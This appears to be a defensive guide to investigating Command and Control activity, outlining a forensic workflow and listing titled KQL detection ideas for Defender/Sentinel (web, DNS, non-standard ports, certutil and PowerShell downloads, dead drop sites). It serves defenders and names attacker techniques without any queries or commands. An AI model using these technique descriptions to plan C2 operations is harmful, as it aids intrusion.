Command and Control (C2) (TA0011) Techniques
Introduction
Forensically investigating Command and Control (C&C) techniques on workstations and server systems involves identifying how an attacker communicates with compromised systems to control them remotely and potentially exfiltrate data. This process is critical for understanding the scope of an attack and mitigating further risks.
1. Understanding Common C&C Techniques
Direct Connections: Using tools like remote desktop, SSH, or VNC.
HTTP/HTTPS-Based Communication: Often disguised as normal web traffic.
DNS-Based Communication: Using DNS queries to send commands or exfiltrate data.
Use of Proxy Servers: To route and obfuscate the traffic.
Social Media and Cloud Services: Utilising popular platforms to disguise communication.
2. Data Collection and Preservation
Forensic Imaging: Create exact images of affected systems using tools like FTK Imager or dd.
Memory Capture: Use tools like Magnet RAM Capture or WinPmem for capturing volatile memory, which may contain remnants of C&C communication.
Log Collection: Gather network logs, firewall logs, DNS logs, system logs, and web proxy logs.
3. Network Traffic Analysis
Traffic Capture and Analysis: Use tools like Wireshark or Tcpdump to analyse network traffic for unusual patterns, especially outbound connections to unknown IPs or domains.
Protocol Analysis: Look for anomalies in standard protocols (HTTP, DNS, etc.) that could indicate C&C activities.
Decryption of Traffic: Where possible, decrypt encrypted network traffic to inspect the contents for command and control communication.
4. DNS Query Analysis
Logs Review: Examine DNS query logs for frequent or irregular requests to uncommon domains, which could be indicative of DNS tunnelling.
5. Firewall and Proxy Logs Analysis
Outbound Traffic: Check for any rules or logs that show unusual outbound traffic, especially traffic bypassing standard network egress points.
6. Endpoint Analysis
Running Processes: Analyse running processes and their network activity for signs of C&C communications.
Startup Items and Scheduled Tasks: Check for persistence mechanisms that may initiate C&C communication upon system restart.
Host-based Intrusion Detection Systems: Review alerts and logs for signs of C&C behaviour.
7. Malware Analysis (if applicable)
Static and Dynamic Analysis: If malware is identified, perform static and dynamic analysis to understand its communication mechanisms.
Reverse Engineering: Reverse-engineering malware may reveal built-in C&C domains or IP addresses.
8. Use of Specialised Forensic Tools
Forensic Suites: Tools like EnCase, Autopsy, or X-Ways for comprehensive system analysis.
Network Analysis Tools: Wireshark, Tcpdump, NetWitness, NetworkMiner for network traffic analysis.
9. Documentation and Reporting
Detailed Documentation: Record all methodologies, findings, and tools used.
Forensic Report: Compile a comprehensive report detailing the C&C investigation, findings, and implications.
10. Post-Investigation Actions
Mitigation and Remediation: Implement measures to disrupt the C&C channels and prevent further unauthorised access.
Recovery and Notifications: Restore systems and notify relevant stakeholders as per organisational and legal requirements.
Tools to Consider
Forensic Imaging: EnCase, AXIOM Cyber, FTK Imager, dd
Memory Capture: Magnet RAM Capture, WinPmem
Network Analysis: Wireshark, Tcpdump, NetWitness, NetworkMiner
Forensic Suites: EnCase, AXIOM Cyber, Binalyze-Air, Autopsy
Key Considerations
Legal Compliance: Ensure the investigation complies with relevant laws and regulations, especially when decrypting traffic.
Chain of Custody: Maintain an accurate chain of custody for all forensic evidence.
Data Confidentiality: Handle all data securely, maintaining its confidentiality and integrity.
C&C investigation requires a multi-faceted approach, combining network analysis, endpoint inspection, and potentially malware analysis to fully understand the attacker's methods and impact. Tailoring the investigation to the specifics of the incident and the environment is crucial.
Using KQL to Investigate Command and Control (C2) Activities in an Environment Using Defender/Sentinel
Command and Control (C2) techniques involve adversaries communicating with compromised systems to control them, exfiltrate data, or execute commands remotely.
1. T1071.001 - Application Layer Protocol: Web Protocols
Objective: Detect and investigate the use of web protocols (HTTP/HTTPS) for Command and Control communication.
Detect Unusual HTTP/HTTPS Traffic
Purpose: Identify unusual HTTP/HTTPS traffic patterns that may indicate C2 communication.
Monitor for Suspicious User-Agent Strings
Purpose: Detect suspicious or uncommon User-Agent strings used by C2 tools.
Identify HTTP/HTTPS Traffic to Uncommon Ports
Purpose: Monitor for web traffic over non-standard ports that may indicate C2 communication.
Detect HTTP POST Requests with Large Payloads
Purpose: Identify large HTTP POST requests that could be exfiltrating data.
Monitor for HTTP Traffic with Suspicious Headers
Purpose: Detect HTTP requests with unusual or suspicious headers that may be used in C2 communication.
Identify HTTP/HTTPS Traffic to Known Malicious Domains
Purpose: Monitor for HTTP/HTTPS traffic to domains associated with C2 infrastructure.
2. T1071.004 - Application Layer Protocol: DNS
Objective: Detect and investigate the use of DNS for Command and Control communication.
Detect DNS Queries to Suspicious Domains
Purpose: Identify DNS queries to suspicious top-level domains often used by attackers.
Monitor for High-Frequency DNS Queries
Purpose: Detect high-frequency DNS queries that may indicate DNS tunneling.
Identify DNS Queries for Uncommon Record Types
Purpose: Monitor for DNS queries with uncommon record types that could be used for C2.
Detect DNS Queries with Long or Suspicious Subdomains
Purpose: Identify DNS queries with unusually long subdomains that may indicate DNS tunnelling.
Monitor for DNS Queries to Dynamic DNS Providers
Purpose: Detect DNS queries to dynamic DNS providers, which are often used for C2.
Identify DNS Queries to Known Malicious C2 Domains
Purpose: Monitor for DNS queries to domains associated with C2 infrastructure.
3. T1095 - Non-Standard Port
Objective: Detect and investigate the use of non-standard ports for Command and Control communication.
Detect Network Traffic on Non-Standard Ports
Purpose: Identify network traffic on uncommon ports that may be used for C2.
Monitor for SSH Traffic on Non-Standard Ports
Purpose: Detect SSH connections on ports other than 22, which may indicate C2 communication.
Identify RDP Traffic on Non-Standard Ports
Purpose: Monitor for RDP connections on ports other than 3389, which may be used for stealthy C2.
Detect Web Traffic on Non-Standard Ports
Purpose: Identify HTTP/HTTPS traffic on non-standard ports, which may indicate C2 communication.
Monitor for FTP Traffic on Non-Standard Ports
Purpose: Detect FTP connections on ports other than 21, which may be used for data exfiltration or C2.
Identify Non-Standard Port Usage by Known Tools
Purpose: Monitor for the use of common network tools on non-standard ports.
4. T1219 - Remote Access Software
Objective: Detect and investigate the use of remote access software that may be used for C2.
Detect Execution of Common Remote Access Tools
Purpose: Identify the execution of common remote access tools.
Monitor for Installation of Remote Access Software
Purpose: Detect registry entries related to the installation of remote access software.
Identify Remote Access Traffic Patterns
Purpose: Monitor for network traffic patterns associated with remote access software.
Detect Use of Remote Access Software Over Non-Standard Ports
Purpose: Identify the use of remote access software over non-standard ports.
Monitor for PowerShell Commands Installing Remote Access Tools
Purpose: Detect PowerShell commands used to install remote access tools.
Identify Persistence Mechanisms for Remote Access Software
Purpose: Monitor for persistence mechanisms used by remote access software.
5. T1105 - Ingress Tool Transfer
Objective: Detect and investigate the transfer of tools or files into a compromised environment, often used to establish C2 channels.
Detect File Downloads from Suspicious Sources
Purpose: Identify file downloads from potentially malicious sources.
Monitor for Use of PowerShell to Download Files
Purpose: Detect PowerShell commands used to download files from the internet.
Identify Use of
certutilfor File Download
Purpose: Monitor for the use of certutil to download files, often used in fileless attacks.
Detect Use of FTP to Transfer Files
Purpose: Identify the use of FTP commands to transfer files into the environment.
Monitor for Execution of Downloaded Files
Purpose: Detect the execution of files downloaded to the default Downloads directory.
Identify Files Transferred Over SMB
Purpose: Monitor for files transferred over SMB shares, which may be used to introduce C2 tools.
6. T1213.002 - Data from Information Repositories: Confluence
Objective: Detect and investigate the use of Confluence (or similar information repositories) for C2 communication or data exfiltration.
Detect Access to Confluence Pages
Purpose: Identify access to Confluence pages, which could be used for data exfiltration or C2 communication.
Monitor for Downloads from Confluence
Purpose: Detect bulk downloads from Confluence that may indicate data collection or exfiltration.
Identify Confluence API Access for Data Extraction
Purpose: Monitor for the use of Confluence APIs to extract data.
Detect Use of PowerShell for Confluence Data Access
Purpose: Identify PowerShell commands that access or extract data from Confluence.
Monitor for Unusual Access Patterns in Confluence
Purpose: Detect unusual access patterns to Confluence that may indicate C2 or exfiltration activities.
Identify Large Data Transfers from Confluence
Purpose: Monitor for large data transfers from Confluence, which could indicate significant data exfiltration.
7. T1102.001 - Web Service: Dead Drop Resolver
Objective: Detect and investigate the use of dead drop resolvers (e.g., pastebin or GitHub) for C2 communication.
Detect Access to Known Dead Drop Sites
Purpose: Identify access to dead drop sites commonly used for C2 communication.
Monitor for Suspicious Pastebin or GitHub Gist Access
Purpose: Detect suspicious GET or POST requests to pastebin or GitHub Gists that may be used for C2.
Identify Access to Newly Created Pastes or Gists
Purpose: Monitor for access to newly created pastes or gists, which could be used as dead drops.
Detect Unusual Traffic to Dead Drop Sites
Purpose: Identify repeated or unusual access to dead drop sites that may indicate C2 activity.
Monitor for Use of PowerShell to Access Dead Drop Sites
Purpose: Detect PowerShell scripts accessing dead drop sites for C2 communication.
Identify Download of C2 Instructions from Dead Drop Sites
Purpose: Monitor for downloads of C2 instructions from dead drop sites.
8. T1210 - Exploitation of Remote Services
Objective: Detect and investigate the exploitation of remote services to establish C2 channels.
Detect Exploitation Attempts via RDP
Purpose: Identify failed RDP logon attempts that may indicate exploitation attempts.
Monitor for Exploitation of SSH
Purpose: Detect SSH connection attempts that are denied, which may indicate exploitation attempts.
Identify Suspicious SMB Activity
Purpose: Monitor for suspicious SMB activity, such as repeated access denied events.
Detect Exploitation of Web Services
Purpose: Identify web exploitation attempts using HTTP POST requests.
Monitor for Vulnerability Scanning Activity
Purpose: Detect vulnerability scanning activity that may precede exploitation attempts.
Identify Exploitation of Remote Services via PowerShell
Purpose: Monitor for PowerShell commands attempting to exploit remote services.
Last updated